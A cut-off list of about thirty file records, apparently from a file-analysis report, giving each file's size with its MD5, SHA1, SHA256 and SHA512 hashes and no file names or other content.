SHA256feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
2.0MB
MD51bf850b4d9587c1017a75a47680584c4
SHA175cd4738ffc07f203c3f3356bc946fdd0bcdbe19
SHA256ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955
SHA512ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08
-
Filesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
Filesize
2.6MB
MD5f514717e6d3e8200abcc4bf4de7cb119
SHA19bcb5e5c8744ec19e9c3c3ea1ad4d72adde2aa77
SHA256316b147c8f4935c3898773c9419080527ff0f0c3410a71f97b5c313eca6f876f
SHA512473b0f1233ffd86e97044a6366d7c08d8692856f3017691cfc0b35bfc76630d36387780fcce78d93f3d7ee1bcddadfbd370c55bda19d6d9b79e2202575ca170c
-
Filesize
3.6MB
MD5d77b61da6606b804a34b9a63675e7e08
SHA147ae3c203b1eab9737faf9cfe285e170712afd2a
SHA256b18858a9364910a2c91138c7aa66ea0764d7e71e4d9a327597bd1b739b95a296
SHA5122019ff93fa63f45e5aaa81829be94ac42771fa3a59eab329ef36afc3d71c2523d9c225cd610ea12d8b7a2a6bc18881378f4b9147ccd4efd538064c924eaf2193
-
Filesize
1.2MB
MD5f20ebf92c8016c3370c571837061ba6f
SHA1530848eb20e6c9f1173e5bf6a440870640a1c07d
SHA256f5ff22bff820be749805aa04a3170b5f682e367ce53eaa54ac7214c3d3570ef3
SHA5128859f0f39d19a49007f648a0b50d35bdfe35fa876d02498ca513016c77cad62e0472341c93d891512e51c25ab999999172f1d18f90beccdcba780f0cd95669af
-
Filesize
3.8MB
MD5d16984f0246782d0abce9c96187f97d6
SHA158907299760703c3cd621663d56c3a04c8ed3413
SHA25605d068b2a2eaa3963eb7dbc774b9531497fbece101dac6f4eaaea147397a296d
SHA5125ab29565393108d7f5bd59b9e8027e2c9ed0ecb3cc6f148dad93eefb1874a3d93f6af4ffab7a3478520be3295258018a2d24c793522274e47f59bccd741520b1
-
Filesize
3.9MB
MD52b9c63cec7be59b85c71d09a0c2cac97
SHA14266945d59c6e628a539c0546ca6ac540a90ef3c
SHA256ec08afd1137c2d93813a304791504ea8d1fd366133c4530a2406533f1cc34256
SHA5121b8cbe1d7fc6f7e27a989ff3a2de5b2691c157df3e17cedc0f7897fcfa68bdc4521c04791f5adb8426b5de4dab294211b7b25cb213e814b0b4930e4435930b8b
-
Filesize
715KB
MD58dc1f88ae1fcedeb3983c5f5c3d486b0
SHA1d40e67ba5558d90cb11eeca04d213322159336fc
SHA2564a15d91920a4da9a64935248c126fb60e8302198df8e5759da8129ac1841beca
SHA5120b2263fe049e280af1178fd396a06a04e6b99f7c971839207ae225161257ed9d9b7eaa8d0ceb1f14d3aa2094b53ce91dd045ebc169102e707ea7285f91432ac1
-
Filesize
238KB
MD58c20d9745afb54a1b59131314c15d61c
SHA11975f997e2db1e487c1caf570263a6a3ba135958
SHA256a613b6598e0d4c2e52e6ff91538aca8d92c66ef7c13a9baadcba0039570a69d1
SHA512580021850dfc90647854dd9f8124418abffbe261e3d7f2e1d355dd3a40f31be24f1b9df77ad52f7fa63503a5ee857e270c156e5575e3a32387335018296128d7
-
Filesize
211KB
MD595fadb59c6f56a41650626902242c541
SHA16207e431219b3432e2745b6f9f10afc94e02a2f2
SHA25601169a885580678630b67ba750108ce554d3e6fcceebc364750d5d2baf427c6e
SHA5121bffaf4b47a67ef2abceb012a033fa6f56828346da74283c638b44b6d8c83af61545571d567d6b5515eebbebca3448536937b0ea4b7e2bd3f56acafb6a3d6963
-
Filesize
128B
MD511bb3db51f701d4e42d3287f71a6a43e
SHA163a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA2566be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2
-
Filesize
256KB
MD5afa9b8c52bf03c892e769685acfab1be
SHA18006bc1965e46a4fb03ae309f4fae5fefbc18c0c
SHA2564a424f665f81bc88535800b65c2be5d72e3d8780e822df809b2d81b3428cda81
SHA51278ecad28cf40255673577a54f869801ea3c2b28b54ed5a9292787d8aab8cfbae010903c4415a6a1ac46455c8add4b3ab969b32ace30bbc4eb311c289580e192e
-
Filesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
2.8MB
MD5713674d5e968cbe2102394be0b2bae6f
SHA190ac9bd8e61b2815feb3599494883526665cb81e
SHA256f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057
SHA512e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb
-
Filesize
2.0MB
MD5dcb505dc2b9d8aac05f4ca0727f5eadb
SHA14f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA25661f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA51231e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3
-
Filesize
94KB
MD5d98e78fd57db58a11f880b45bb659767
SHA1ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
3.8MB
MD5223edef89e4dfc4ec3812408879e885f
SHA1b54c433a6f9982319a22eb73f613134a7b64eddc
SHA256d01f8d57f4f6cc3764958328b97ddcaa020ec2e5e854412354ea439c64a51316
SHA5124001807cacf720863c3b1a1f4f6a86d95969308d22e5923bfac1dc62cc4b3ef19708884509b418d9f7eafe68dbea0265759b50b026ecaaa7e2279591fdda71e7
-
Filesize
3.5MB
MD517bc3975738d4b439b91e43f09e8e15a
SHA1bbe7b3b421b9a5651ba2583008c7fc027f879da4
SHA25608a649f2603d92f7a81dda1f4e40dc6c6bd4019f75cb9444245a51c1411ea31c
SHA512b823920d23c110583f9dcae80fcd00e749522ca6b4a9fa1b2af292ee47111f6b97d18fa47f68ab0d067264e3aac2e62537466542d770a063094722a0704753d6
-
Filesize
1.5MB
MD5f0616fa8bc54ece07e3107057f74e4db
SHA1b33995c4f9a004b7d806c4bb36040ee844781fca
SHA2566e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA51215242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c
-
Filesize
5.3MB
MD51afff8d5352aecef2ecd47ffa02d7f7d
SHA18b115b84efdb3a1b87f750d35822b2609e665bef
SHA256c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb
-
Filesize
4.9MB
MD5cac8d4647d123593dba2ffce41daeab4
SHA12322d6d2a5d31c86367965312e8c0a765b6d9644
SHA2561f61a1204bc065d608f1538551b636775cd018da760682ecac8e5a67b557ee57
SHA5122c7c5f2587065f7cc89e3130d21c4f9ad7c6cfe4252f1c34720422d3bdeed9ae4671962a5644197be72511839784b37f301f44dd73c1e75211c61539f8d8890a
-
Filesize
4.0MB
MD53c7bc8862a283ee00fa6d16ca02dbc6a
SHA1ab7d5a133bf1e7ccc17c8c134fd408408fec2610
SHA25615c95a01767ae510d338c45196264a818e0c86c673264392d6fae95dd5e40fcd
SHA512d92c76fe529f6e55fd428d254536d83b849b38725ae5c734466589bcfe1a20124180274ca210b85f55b8eaa8b6c093cc10075211cc02952213c5e2de13d59dc4
-
Filesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
Filesize
163KB
MD55c399d34d8dc01741269ff1f1aca7554
SHA1e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA5128ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
-
Filesize
4.7MB
MD55e94f0f6265f9e8b2f706f1d46bbd39e
SHA1d0189cba430f5eea07efe1ab4f89adf5ae2453db
SHA25650a46b3120da828502ef0caba15defbad004a3adb88e6eacf1f9604572e2d503
SHA512473dfa66a36feed9b29a43245074141478327ce22ba7cce512599379dcb783b4d665e2d65c5e9750b988c7ed8f6c3349a7a12d4b8b57c89840eee6ca6e1a30cd
-
Filesize
4.2MB
MD566560a15081c9dee9fed498d5f0a25a9
SHA1fbd7626525777262423fb9beea1e5b7e50fda2b5
SHA25611e2cfb1fb58a3f69826d5bc36e88fde44c53def20891739ea7054eaabf24551
SHA512dbd84583c6248db88452ef12074aa668ee982a9fe18484611a1b6d67a7233f9f3fca466bc843dfbc227099a5fd67af24c98f2d5408b26f8cf9fd635f7c70ba07